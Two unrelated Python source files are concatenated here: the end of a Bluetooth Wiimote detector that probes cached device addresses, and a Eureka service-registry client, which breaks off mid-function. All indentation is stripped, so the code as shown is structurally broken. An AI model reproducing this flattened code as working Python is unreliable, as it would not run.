self.getAlreadyConnectedIdsCallback = getAlreadyConnectedIdsCallback
self.discoverThread = None
self.d = None
self.knownBTIds = []
moteCache = MoteCache()
moteCache.read()
self.knownMoteIds = moteCache.getMotes()
if len(self.knownMoteIds) == 0:
print "********** WARNING: not mote cache detected, no motes will be found this way."
#self.knownMoteIds = {"00:1E:A9:4F:59:8E":""}
self.shortCheckDelay=3.0
self.allConnectedDelay=3.0
self.shortTimeout = 2.0
self.numToConnect = numToConnect
self.searchEvent = threading.Event() # signals when to start looking for more motes
self.keepFirstConnection=False
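    # Short checks probe each cached mote id with a quick L2CAP connect attempt;
    # the long check (disabled here, readyForLongCheck always returns False)
    # would run a full bluetooth inquiry via SimpleDiscoverer.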
def discoverIteration(self):
rfds = select.select( self.readfiles, [], [] )[0]
if self.d in rfds:
self.d.process_event()
return self.d.done
def readyForLongCheck(self):
return False
def readyForShortCheck(self):
return True
def discoverCallback(self, address, device_class, name):
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
if address not in connectedMoteIds and address not in self.knownBTIds:
print "DISCOVER CALLBACK:", address, device_class, name
if type(name) == type(""):
if "nintendo" in name.lower():
self.detectedCallback(address, device_class, name)
else:
print "WARNING: NEED to request NAME (for never used motes)"
self.knownBTIds.append(address)
def tryKnownIds(self):
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
for moteId in self.knownMoteIds.keys():
if moteId not in connectedMoteIds:
try:
print "trying to connect to known mote id:", moteId
INTERRUPT_PORT = 19
tmpIntSock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
tmpIntSock.settimeout(self.shortTimeout)
tmpIntSock.connect( (moteId, INTERRUPT_PORT) )
if self.keepFirstConnection:
self.detectedCallback(moteId, tmpIntSock)
tmpIntSock = 0
else:
tmpIntSock.close() # succeeded
#self.detectedCallback(moteId, None, None)
self.detectedCallback(moteId)
except bluetooth.BluetoothError, e:
if e.message == "timed out":
print "timed out"
else:
print "Err no.:", e.errno, "Error msg:", e.message
try:
tmpIntSock.close() # succeeded
except Exception, e:
print "Error trying to close socket with failed connection. Err no.:", e.errno, "Error msg:", e.message
time.sleep(0.001)
def discoverLoop(self):
print "DISCOVERLOOOP"
if self.readyForShortCheck():
self.tryKnownIds()
if self.readyForLongCheck():
while self.readyForLongCheck():
if self.readyForShortCheck():
self.tryKnownIds()
self.d = SimpleDiscoverer()
self.d.discoverCallback = self.discoverCallback
while 1:
#self.d.find_devices(lookup_names = True)
self.d.find_devices(lookup_names = False)
self.readfiles = [ self.d, ]
done = False
while done == False:
done = self.discoverIteration()
else:
print "DISCOVERLOOOP_B"
while 1:
try:
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
print "DISCOVERLOOOP_C", len(connectedMoteIds), self.numToConnect
if len(connectedMoteIds) < self.numToConnect:
print "DISCOVERLOOOP_D", len(connectedMoteIds), self.numToConnect
self.tryKnownIds()
time.sleep(self.shortCheckDelay)
connectedMoteIds = self.getAlreadyConnectedIdsCallback()
else:
#time.sleep(self.allConnectedDelay)
print "searchEvent wait"
self.searchEvent.wait()
print "searchEvent finished waiting"
except:
traceback.print_exc()
def reinitiateSearching(self):
self.searchEvent.set() # calling set and clear will wake the discoverLoop
self.searchEvent.clear()
def startInThread(self):
self.discoverThread = threading.Thread(target=self.discoverLoop)
self.discoverThread.start()
def startWithoutThread(self):
self.discoverLoop()
if __name__ == "__main__":
from connectToMote import connectToMote
class NewMoteHandler:
def __init__(self):
self.motes = {}
def handleNewMoteCallback(self, address, device_class, name):
if address not in self.motes.keys():
self.connectToMote(address)
def connectToMote(self, moteId):
mote = connectToMote(moteId)
if mote.connected:
self.motes[moteId] = mote
def getConnectedMoteIds(self):
return self.motes.keys()
moteHandler = NewMoteHandler()
detector = MoteDetector(detectedCallback=moteHandler.handleNewMoteCallback, getAlreadyConnectedIdsCallback=moteHandler.getConnectedMoteIds, numToConnect=1)
detector.startInThread()
count = 0
import time
numPoints = 0
startTime = time.time()
reportInterval = 0.5
lastReport = startTime
while 1:
for moteId, mote in moteHandler.motes.items():
#print "mote:", moteId, mote.extractNormalizedPoints()
numPoints += len(mote.extractNormalizedPoints())
#print "Numpoints:", numPoints
currentTime = time.time()
elapsedTime = currentTime - lastReport
if elapsedTime > reportInterval:
print "pts/sec:", numPoints / elapsedTime
numPoints = 0
lastReport = currentTime
|
eureka_client.py
|
# -*- coding: utf-8 -*-
import atexit
import json
import os
import re
import socket
import time
import random
import inspect
import xml.etree.ElementTree as ElementTree
from threading import Timer
from threading import RLock
from threading import Thread
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from py_eureka_client.__logger__ import get_logger
import py_eureka_client.http_client as http_client
try:
long(0)
except NameError:
    # Python 3 no longer has the long type; use int instead
long = int
_logger = get_logger("EurekaClient")
"""
Status of instances
"""
INSTANCE_STATUS_UP = "UP"
INSTANCE_STATUS_DOWN = "DOWN"
INSTANCE_STATUS_STARTING = "STARTING"
INSTANCE_STATUS_OUT_OF_SERVICE = "OUT_OF_SERVICE"
INSTANCE_STATUS_UNKNOWN = "UNKNOWN"
"""
Action type of instances
"""
ACTION_TYPE_ADDED = "ADDED"
ACTION_TYPE_MODIFIED = "MODIFIED"
ACTION_TYPE_DELETED = "DELETED"
"""
This is for the DiscoveryClient; when this strategy is set, get_service_url will randomly choose one of the UP instances and return its url.
This is the default strategy
"""
HA_STRATEGY_RANDOM = 1
"""
This is for the DiscoveryClient; when this strategy is set, get_service_url will keep returning the same instance until it goes down.
"""
HA_STRATEGY_STICK = 2
"""
This is for the DiscoveryClient; when this strategy is set, get_service_url will always return a different instance from the last one, as long as any other instance is up.
"""
HA_STRATEGY_OTHER = 3
"""
The timeout in seconds for all HTTP requests sent to the eureka server.
"""
_DEFAULT_TIME_OUT = 5
"""
Default eureka server url.
"""
_DEFAULT_EUREKA_SERVER_URL = "http://127.0.0.1:8761/eureka/"
"""
Default instance field values
"""
_DEFAULT_INSTNACE_PORT = 9090
_DEFAULT_INSTNACE_SECURE_PORT = 9443
_RENEWAL_INTERVAL_IN_SECS = 30
_DURATION_IN_SECS = 90
_DEFAULT_DATA_CENTER_INFO = "MyOwn"
_DEFAULT_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo"
"""
Default encoding
"""
_DEFAULT_ENCODING = "utf-8"
### =========================> Base Methods <======================================== ###
### Beans ###
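# Plain data holders mirroring the eureka REST payloads; Applications and
# Application guard their internal lists with RLocks because they may be read
# and updated from different threads.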
class Applications:
def __init__(self,
apps__hashcode="",
versions__delta="",
applications=None):
self.apps__hashcode = apps__hashcode
self.versions__delta = versions__delta
self.__applications = applications if applications is not None else []
self.__application_name_dic = {}
self.__app_lock = RLock()
@property
def appsHashcode(self):
return self.apps__hashcode
@property
def applications(self):
return self.__applications
@property
def versionsDelta(self):
return self.versions__delta
def add_application(self, application):
with self.__app_lock:
self.__applications.append(application)
self.__application_name_dic[application.name] = application
def get_application(self, app_name):
with self.__app_lock:
if app_name in self.__application_name_dic:
return self.__application_name_dic[app_name]
else:
return Application(name=app_name)
class Application:
def __init__(self,
name="",
instances=None):
self.name = name
self.__instances = instances if instances is not None else []
self.__instances_dict = {}
self.__inst_lock = RLock()
@property
def instances(self):
with self.__inst_lock:
return self.__instances
@property
def up_instances(self):
with self.__inst_lock:
up_inst = []
for item in self.__instances:
if item.status == INSTANCE_STATUS_UP:
up_inst.append(item)
return up_inst
def get_instance(self, instance_id):
with self.__inst_lock:
if instance_id in self.__instances_dict:
return self.__instances_dict[instance_id]
else:
return None
def add_instance(self, instance):
with self.__inst_lock:
self.__instances.append(instance)
self.__instances_dict[instance.instanceId] = instance
def update_instance(self, instance):
with self.__inst_lock:
_logger.debug("update instance %s" % instance.instanceId)
updated = False
for idx in range(len(self.__instances)):
ele = self.__instances[idx]
if ele.instanceId == instance.instanceId:
_logger.debug("updating index %d" % idx)
self.__instances[idx] = instance
updated = True
break
if not updated:
self.add_instance(instance)
def remove_instance(self, instance):
with self.__inst_lock:
for idx in range(len(self.__instances)):
ele = self.__instances[idx]
if ele.instanceId == instance.instanceId:
del self.__instances[idx]
break
if instance.instanceId in self.__instances_dict:
del self.__instances_dict[instance.instanceId]
class LeaseInfo:
def __init__(self,
renewalIntervalInSecs=_RENEWAL_INTERVAL_IN_SECS,
durationInSecs=_DURATION_IN_SECS,
registrationTimestamp=0,
lastRenewalTimestamp=0,
renewalTimestamp=0,
evictionTimestamp=0,
serviceUpTimestamp=0):
self.renewalIntervalInSecs = renewalIntervalInSecs
self.durationInSecs = durationInSecs
self.registrationTimestamp = registrationTimestamp
self.lastRenewalTimestamp = lastRenewalTimestamp
self.renewalTimestamp = renewalTimestamp
self.evictionTimestamp = evictionTimestamp
self.serviceUpTimestamp = serviceUpTimestamp
class DataCenterInfo:
def __init__(self,
name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
className=_DEFAULT_DATA_CENTER_INFO_CLASS):
self.name = name
self.className = className
class PortWrapper:
def __init__(self, port=0, enabled=False):
self.port = port
self.enabled = enabled
class Instance:
def __init__(self,
instanceId="",
sid="", # @deprecated
app="",
appGroupName="",
ipAddr="",
port=PortWrapper(port=_DEFAULT_INSTNACE_PORT, enabled=True),
securePort=PortWrapper(port=_DEFAULT_INSTNACE_SECURE_PORT, enabled=False),
homePageUrl="",
statusPageUrl="",
healthCheckUrl="",
secureHealthCheckUrl="",
vipAddress="",
secureVipAddress="",
countryId=1,
dataCenterInfo=DataCenterInfo(),
hostName="",
status="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
overriddenstatus="", # UP, DOWN, STARTING, OUT_OF_SERVICE, UNKNOWN
leaseInfo=LeaseInfo(),
isCoordinatingDiscoveryServer=False,
metadata=None,
lastUpdatedTimestamp=0,
lastDirtyTimestamp=0,
actionType=ACTION_TYPE_ADDED, # ADDED, MODIFIED, DELETED
asgName=""):
self.instanceId = instanceId
self.sid = sid
self.app = app
self.appGroupName = appGroupName
self.ipAddr = ipAddr
self.port = port
self.securePort = securePort
self.homePageUrl = homePageUrl
self.statusPageUrl = statusPageUrl
self.healthCheckUrl = healthCheckUrl
self.secureHealthCheckUrl = secureHealthCheckUrl
self.vipAddress = vipAddress
self.secureVipAddress = secureVipAddress
self.countryId = countryId
self.dataCenterInfo = dataCenterInfo
self.hostName = hostName
self.status = status
self.overriddenstatus = overriddenstatus
self.leaseInfo = leaseInfo
self.isCoordinatingDiscoveryServer = isCoordinatingDiscoveryServer
self.metadata = metadata if metadata is not None else {}
self.lastUpdatedTimestamp = lastUpdatedTimestamp
self.lastDirtyTimestamp = lastDirtyTimestamp
self.actionType = actionType
self.asgName = asgName
########################## Basic functions #################################
####### Registry functions #########
def register(eureka_server, instance):
instance_dic = {
'instanceId': instance.instanceId,
'hostName': instance.hostName,
'app': instance.app,
'ipAddr': instance.ipAddr,
'status': instance.status,
'overriddenstatus': instance.overriddenstatus,
'port': {
'$': instance.port.port,
'@enabled': str(instance.port.enabled).lower()
},
'securePort': {
'$': instance.securePort.port,
'@enabled': str(instance.securePort.enabled).lower()
},
'countryId': instance.countryId,
'dataCenterInfo': {
'@class': instance.dataCenterInfo.className,
'name': instance.dataCenterInfo.name
},
'leaseInfo': {
'renewalIntervalInSecs': instance.leaseInfo.renewalIntervalInSecs,
'durationInSecs': instance.leaseInfo.durationInSecs,
'registrationTimestamp': instance.leaseInfo.registrationTimestamp,
'lastRenewalTimestamp': instance.leaseInfo.lastRenewalTimestamp,
'evictionTimestamp': instance.leaseInfo.evictionTimestamp,
'serviceUpTimestamp': instance.leaseInfo.serviceUpTimestamp
},
'metadata': instance.metadata,
'homePageUrl': instance.homePageUrl,
'statusPageUrl': instance.statusPageUrl,
'healthCheckUrl': instance.healthCheckUrl,
'secureHealthCheckUrl': instance.secureHealthCheckUrl,
'vipAddress': instance.vipAddress,
'secureVipAddress': instance.secureVipAddress,
'lastUpdatedTimestamp': str(instance.lastUpdatedTimestamp),
'lastDirtyTimestamp': str(instance.lastDirtyTimestamp),
'isCoordinatingDiscoveryServer': str(instance.isCoordinatingDiscoveryServer).lower()
}
_register(eureka_server, instance_dic)
def _register(eureka_server, instance_dic):
req = http_client.Request(_format_url(eureka_server) + "apps/%s" % instance_dic["app"])
req.add_header('Content-Type', 'application/json')
req.get_method = lambda: "POST"
http_client.load(req, json.dumps({"instance": instance_dic}).encode(_DEFAULT_ENCODING), timeout=_DEFAULT_TIME_OUT)
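# For reference (derived from the code above, not a full spec): registration
# is a POST to <eureka_server>/apps/<APP_NAME> with a JSON body of the form
#   {"instance": {"instanceId": "...", "hostName": "...", "app": "...",
#                 "port": {"$": 9090, "@enabled": "true"}, ...}}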
def cancel(eureka_server, app_name, instance_id):
req = http_client.Request(_format_url(eureka_server) + "apps/%s/%s" % (app_name, instance_id))
req.get_method = lambda: "DELETE"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def send_heart_beat(eureka_server, app_name, instance_id, last_dirty_timestamp, status=INSTANCE_STATUS_UP, overriddenstatus=""):
url = _format_url(eureka_server) + "apps/%s/%s?status=%s&lastDirtyTimestamp=%s" % \
(app_name, instance_id, status, str(last_dirty_timestamp))
_logger.debug("heartbeat url::" + url)
if overriddenstatus != "":
url += "&overriddenstatus=" + overriddenstatus
req = http_client.Request(url)
req.get_method = lambda: "PUT"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def status_update(eureka_server, app_name, instance_id, last_dirty_timestamp, status):
url = _format_url(eureka_server) + "apps/%s/%s?status=%s&lastDirtyTimestamp=%s" % \
(app_name, instance_id, status, str(last_dirty_timestamp))
req = http_client.Request(url)
req.get_method = lambda: "PUT"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
def delete_status_override(eureka_server, app_name, instance_id, last_dirty_timestamp):
url = _format_url(eureka_server) + "apps/%s/%s/status?lastDirtyTimestamp=%s" % \
(app_name, instance_id, str(last_dirty_timestamp))
req = http_client.Request(url)
req.get_method = lambda: "DELETE"
http_client.load(req, timeout=_DEFAULT_TIME_OUT)
####### Discovery functions ########
def get_applications(eureka_server, regions=[]):
return _get_applications_(_format_url(eureka_server) + "apps/", regions)
def _format_url(url):
if url.endswith('/'):
return url
else:
return url + "/"
def _get_applications_(url, regions=[]):
_url = url
if len(regions) > 0:
_url = _url + ("&" if "?" in _url else "?") + "regions=" + (",".join(regions))
txt = http_client.load(_url, timeout=_DEFAULT_TIME_OUT)
return _build_applications(ElementTree.fromstring(txt))
def _build_applications(xml_node):
if xml_node.tag != "applications":
return None
applications = Applications()
for child_node in list(xml_node):
if child_node.tag == "versions__delta" and child_node.text is not None:
applications.versions__delta = child_node.text
elif child_node.tag == "apps__hashcode" and child_node.text is not None:
applications.apps__hashcode = child_node.text
elif child_node.tag == "application":
applications.add_application(_build_application(child_node))
return applications
def _build_application(xml_node):
if xml_node.tag != "application":
return None
application = Application()
for child_node in xml_node:
if child_node.tag == "name":
application.name = child_node.text
elif child_node.tag == "instance":
application.add_instance(_build_instance(child_node))
return application
def _build_instance(xml_node):
if xml_node.tag != "instance":
return None
instance = Instance()
for child_node in xml_node:
if child_node.tag == "instanceId":
instance.instanceId = child_node.text
elif child_node.tag == "sid":
instance.sid = child_node.text
elif child_node.tag == "app":
instance.app = child_node.text
elif child_node.tag == "appGroupName":
instance.appGroupName = child_node.text
elif child_node.tag == "ipAddr":
instance.ipAddr = child_node.text
elif child_node.tag == "port":
instance.port = _build_port(child_node)
elif child_node.tag == "securePort":
instance.securePort = _build_port(child_node)
elif child_node.tag == "homePageUrl":
instance.homePageUrl = child_node.text
elif child_node.tag == "statusPageUrl":
instance.statusPageUrl = child_node.text
elif child_node.tag == "healthCheckUrl":
instance.healthCheckUrl = child_node.text
elif child_node.tag == "secureHealthCheckUrl":
instance.secureHealthCheckUrl = child_node.text
elif child_node.tag == "vipAddress":
instance.vipAddress = child_node.text
elif child_node.tag == "secureVipAddress":
instance.secureVipAddress = child_node.text
elif child_node.tag == "countryId":
instance.countryId = int(child_node.text)
elif child_node.tag == "dataCenterInfo":
instance.dataCenterInfo = DataCenterInfo(name=child_node.text, className=child_node.attrib["class"])
elif child_node.tag == "hostName":
instance.hostName = child_node.text
elif child_node.tag == "status":
instance.status = child_node.text
elif child_node.tag == "overriddenstatus":
instance.overriddenstatus = child_node.text
elif child_node.tag == "leaseInfo":
instance.leaseInfo = _build_lease_info(child_node)
elif child_node.tag == "isCoordinatingDiscoveryServer":
instance.isCoordinatingDiscoveryServer = (child_node.text == "true")
elif child_node.tag == "metadata":
instance.metadata = _build_metadata(child_node)
elif child_node.tag == "lastUpdatedTimestamp":
instance.lastUpdatedTimestamp = long(child_node.text)
elif child_node.tag == "lastDirtyTimestamp":
instance.lastDirtyTimestamp = long(child_node.text)
elif child_node.tag == "actionType":
instance.actionType = child_node.text
elif child_node.tag == "asgName":
instance.asgName = child_node.text
return instance
def _build_metadata(xml_node):
metadata = {}
for child_node in list(xml_node):
metadata[child_node.tag] = child_node.text
return metadata
def _build_lease_info(xml_node):
leaseInfo = LeaseInfo()
for child_node in list(xml_node):
if child_node.tag == "renewalIntervalInSecs":
leaseInfo.renewalIntervalInSecs = int(child_node.text)
elif child_node.tag == "durationInSecs":
leaseInfo.durationInSecs = int(child_node.text)
elif child_node.tag == "registrationTimestamp":
leaseInfo.registrationTimestamp = long(child_node.text)
elif child_node.tag == "lastRenewalTimestamp":
leaseInfo.lastRenewalTimestamp = long(child_node.text)
elif child_node.tag == "renewalTimestamp":
leaseInfo.renewalTimestamp = long(child_node.text)
elif child_node.tag == "evictionTimestamp":
leaseInfo.evictionTimestamp = long(child_node.text)
elif child_node.tag == "serviceUpTimestamp":
leaseInfo.serviceUpTimestamp = long(child_node.text)
return leaseInfo
def _build_port(xml_node):
port = PortWrapper()
port.port = int(xml_node.text)
port.enabled = (xml_node.attrib["enabled"] == "true")
return port
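# The XML consumed by the builders above follows the eureka REST response
# format; a trimmed example (for illustration):
#   <instance>
#     <instanceId>host-1:myapp:9090</instanceId>
#     <app>MYAPP</app>
#     <ipAddr>10.0.0.5</ipAddr>
#     <port enabled="true">9090</port>
#     <securePort enabled="false">9443</securePort>
#     <status>UP</status>
#   </instance>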
def get_delta(eureka_server, regions=[]):
return _get_applications_(_format_url(eureka_server) + "apps/delta", regions)
def get_vip(eureka_server, vip, regions=[]):
return _get_applications_(_format_url(eureka_server) + "vips/" + vip, regions)
def get_secure_vip(eureka_server, svip, regions=[]):
return _get_applications_(_format_url(eureka_server) + "svips/" + svip, regions)
def get_application(eureka_server, app_name):
url = _format_url(eureka_server) + "apps/" + app_name
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)
return _build_application(ElementTree.fromstring(txt))
def get_app_instance(eureka_server, app_name, instance_id):
return _get_instance_(_format_url(eureka_server) + "apps/%s/%s" % (app_name, instance_id))
def get_instance(eureka_server, instance_id):
return _get_instance_(_format_url(eureka_server) + "instances/" + instance_id)
def _get_instance_(url):
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)
return _build_instance(ElementTree.fromstring(txt))
def _current_time_millis():
return int(time.time() * 1000)
"""====================== Registry Client ======================================="""
class RegistryClient:
"""Eureka client for spring cloud"""
def __init__(self,
eureka_server=_DEFAULT_EUREKA_SERVER_URL,
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecated
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={}):
assert eureka_server is not None and eureka_server != "", "eureka server must be specified."
assert app_name is not None and app_name != "", "application name must be specified."
assert instance_port > 0, "port is invalid"
assert isinstance(metadata, dict), "metadata must be dict"
self.__net_lock = RLock()
self.__eureka_servers = eureka_server.split(",")
def try_to_get_client_ip(url):
if instance_host == "" and instance_ip == "":
self.__instance_host = self.__instance_ip = RegistryClient.__get_instance_ip(url)
elif instance_host != "" and instance_ip == "":
self.__instance_host = instance_host
if RegistryClient.__is_ip(instance_host):
self.__instance_ip = instance_host
else:
self.__instance_ip = RegistryClient.__get_instance_ip(url)
else:
self.__instance_host = instance_ip
self.__instance_ip = instance_ip
self.__try_all_eureka_server(try_to_get_client_ip)
mdata = {
'management.port': str(instance_port)
}
mdata.update(metadata)
self.__instance = {
'instanceId': instance_id if instance_id != "" else "%s:%s:%d" % (self.__instance_host, app_name.lower(), instance_port),
'hostName': self.__instance_host,
'app': app_name.upper(),
'ipAddr': self.__instance_ip,
'port': {
'$': instance_port,
'@enabled': str(instance_unsecure_port_enabled).lower()
},
'securePort': {
'$': instance_secure_port,
'@enabled': str(instance_secure_port_enabled).lower()
},
'countryId': countryId,
'dataCenterInfo': {
'@class': _DEFAULT_DATA_CENTER_INFO_CLASS,
'name': data_center_name
},
'leaseInfo': {
'renewalIntervalInSecs': renewal_interval_in_secs,
'durationInSecs': duration_in_secs,
'registrationTimestamp': 0,
'lastRenewalTimestamp': 0,
'evictionTimestamp': 0,
'serviceUpTimestamp': 0
},
'metadata': mdata,
'homePageUrl': RegistryClient.__format_url(home_page_url, self.__instance_host, instance_port),
'statusPageUrl': RegistryClient.__format_url(status_page_url, self.__instance_host, instance_port, "info"),
'healthCheckUrl': RegistryClient.__format_url(health_check_url, self.__instance_host, instance_port, "health"),
'secureHealthCheckUrl': secure_health_check_url,
'vipAddress': vip_adr if vip_adr != "" else app_name.lower(),
'secureVipAddress': secure_vip_addr if secure_vip_addr != "" else app_name.lower(),
'isCoordinatingDiscoveryServer': str(is_coordinating_discovery_server).lower()
}
self.__alive = False
self.__heart_beat_timer = Timer(renewal_interval_in_secs, self.__heart_beat)
self.__heart_beat_timer.daemon = True
def __try_all_eureka_server(self, fun):
with self.__net_lock:
untry_servers = self.__eureka_servers
tried_servers = []
ok = False
while len(untry_servers) > 0:
url = untry_servers[0].strip()
try:
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("Eureka server [%s] is down, use next url to try." % url)
tried_servers.append(url)
untry_servers = untry_servers[1:]
else:
ok = True
break
if len(tried_servers) > 0:
untry_servers.extend(tried_servers)
self.__eureka_servers = untry_servers
if not ok:
raise http_client.URLError("All eureka servers are down!")
@staticmethod
def __format_url(url, host, port, default_ctx=""):
if url != "":
if url.startswith('http'):
_url = url
elif url.startswith('/'):
_url = 'http://%s:%d%s' % (host, port, url)
else:
_url = 'http://%s:%d/%s' % (host, port, url)
else:
_url = 'http://%s:%d/%s' % (host, port, default_ctx)
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
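# Note on the trick above: connecting a UDP socket does not send any packets;
# it only makes the OS pick the local interface that would route to the
# eureka host, so getsockname() returns the ip this client is reachable on.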
def register(self, status=INSTANCE_STATUS_UP, overriddenstatus=INSTANCE_STATUS_UNKNOWN):
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(_current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(_current_time_millis())
try:
self.__try_all_eureka_server(lambda url: _register(url, self.__instance))
except:
_logger.exception("error!")
else:
self.__alive = True
def cancel(self):
try:
self.__try_all_eureka_server(lambda url: cancel(url, self.__instance["app"], self.__instance["instanceId"]))
except:
_logger.exception("error!")
else:
self.__alive = False
def send_heart_beat(self, overridden_status=""):
try:
self.__try_all_eureka_server(lambda url: send_heart_beat(url, self.__instance["app"],
self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"], overriddenstatus=overridden_status))
except:
_logger.exception("Error!")
_logger.info("Cannot send heartbeat to server, try to register")
self.register()
def status_update(self, new_status):
self.__instance["status"] = new_status
try:
self.__try_all_eureka_server(lambda url: status_update(url, self.__instance["app"], self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"], new_status))
except:
_logger.exception("error!")
def delete_status_override(self):
self.__try_all_eureka_server(lambda url: delete_status_override(
url, self.__instance["app"], self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"]))
def start(self):
_logger.debug("start to registry client...")
self.register()
self.__heart_beat_timer.start()
def stop(self):
if self.__alive:
_logger.debug("stopping client...")
if self.__heart_beat_timer.is_alive():
self.__heart_beat_timer.cancel()
self.register(status=INSTANCE_STATUS_DOWN)
self.cancel()
def __heart_beat(self):
while True:
_logger.debug("sending heart beat to spring cloud server ")
self.send_heart_beat()
time.sleep(self.__instance["leaseInfo"]["renewalIntervalInSecs"])
__cache_key = "default"
__cache_registry_clients = {}
__cache_registry_clients_lock = RLock()
def init_registry_client(eureka_server=_DEFAULT_EUREKA_SERVER_URL,
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecated
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={}):
with __cache_registry_clients_lock:
client = RegistryClient(eureka_server=eureka_server,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
countryId=countryId,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata)
__cache_registry_clients[__cache_key] = client
client.start()
return client
def get_registry_client():
# type: () -> RegistryClient
with __cache_registry_clients_lock:
if __cache_key in __cache_registry_clients:
return __cache_registry_clients[__cache_key]
else:
return None
"""======================== Cached Discovery Client ============================"""
class DiscoveryClient:
"""Discover the apps registered in spring cloud server, this class will do some cached, if you want to get the apps immediatly, use the global functions"""
def __init__(self, eureka_server, regions=None, renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS, ha_strategy=HA_STRATEGY_RANDOM):
assert ha_strategy in [HA_STRATEGY_RANDOM, HA_STRATEGY_STICK, HA_STRATEGY_OTHER], "do not support strategy %d " % ha_strategy
self.__eureka_servers = eureka_server.split(",")
self.__regions = regions if regions is not None else []
self.__cache_time_in_secs = renewal_interval_in_secs
self.__applications = None
self.__delta = None
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__timer = Timer(self.__cache_time_in_secs, self.__heartbeat)
self.__timer.daemon = True
self.__application_mth_lock = RLock()
self.__net_lock = RLock()
def __heartbeat(self):
while True:
self.__fetch_delta()
time.sleep(self.__cache_time_in_secs)
@property
def applications(self):
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_all_eureka_server(self, fun):
with self.__net_lock:
untry_servers = self.__eureka_servers
tried_servers = []
ok = False
while len(untry_servers) > 0:
url = untry_servers[0].strip()
try:
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("Eureka server [%s] is down, use next url to try." % url)
tried_servers.append(url)
untry_servers = untry_servers[1:]
else:
ok = True
break
if len(tried_servers) > 0:
untry_servers.extend(tried_servers)
self.__eureka_servers = untry_servers
if not ok:
raise http_client.URLError("All eureka servers are down!")
def __pull_full_registry(self):
def do_pull(url): # the actual function body
self.__applications = get_applications(url, self.__regions)
self.__delta = self.__applications
self.__try_all_eureka_server(do_pull)
def __fetch_delta(self):
def do_fetch(url):
if self.__applications is None or len(self.__applications.applications) == 0:
self.__pull_full_registry()
return
delta = get_delta(url, self.__regions)
_logger.debug("delta got: v.%s::%s" % (delta.versionsDelta, delta.appsHashcode))
if self.__delta is not None \
and delta.versionsDelta == self.__delta.versionsDelta \
and delta.appsHashcode == self.__delta.appsHashcode:
return
self.__merge_delta(delta)
self.__delta = delta
if not self.__is_hash_match():
self.__pull_full_registry()
self.__try_all_eureka_server(do_fetch)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug("check hash, local[%s], remote[%s]" % (app_hash, self.__delta.appsHashcode))
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug("merge delta...length of application got from delta::%d" % len(delta.applications))
for application in delta.applications:
for instance in application.instances:
_logger.debug("instance [%s] has %s" % (instance.instanceId, instance.actionType))
if instance.actionType in (ACTION_TYPE_ADDED, ACTION_TYPE_MODIFIED):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
